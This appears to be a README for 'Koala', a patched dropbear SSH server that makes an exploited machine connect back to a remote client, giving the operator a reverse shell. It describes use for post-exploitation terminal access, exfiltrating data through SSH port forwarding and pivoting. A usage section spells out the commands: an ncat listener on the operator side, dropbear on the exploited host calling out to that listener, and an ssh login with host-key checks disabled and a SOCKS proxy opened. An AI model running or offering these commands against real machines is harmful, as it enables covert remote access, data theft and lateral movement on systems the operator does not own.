Koala is a patched version of the dropbear SSH server that instead of binding to a port opens up reverse shells by connecting to a remote client. This is useful for gaining a pty terminal on an exploited machine and also for secure exfiltration of data via SSH port forwarding. Pivoting can also be done by using the dynamic SSH port forwarding feature. [Usage] Run the following command on the client to listen for the SSH connection: $ ncat -lvp 5000 --sh-exec 'ncat -lvp 9999' On the exploited host run: $ ./dropbear -p client-host:5000 Now on the client, connect to port 9999 to open up a shell: $ ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null localhost -D9050 -p9999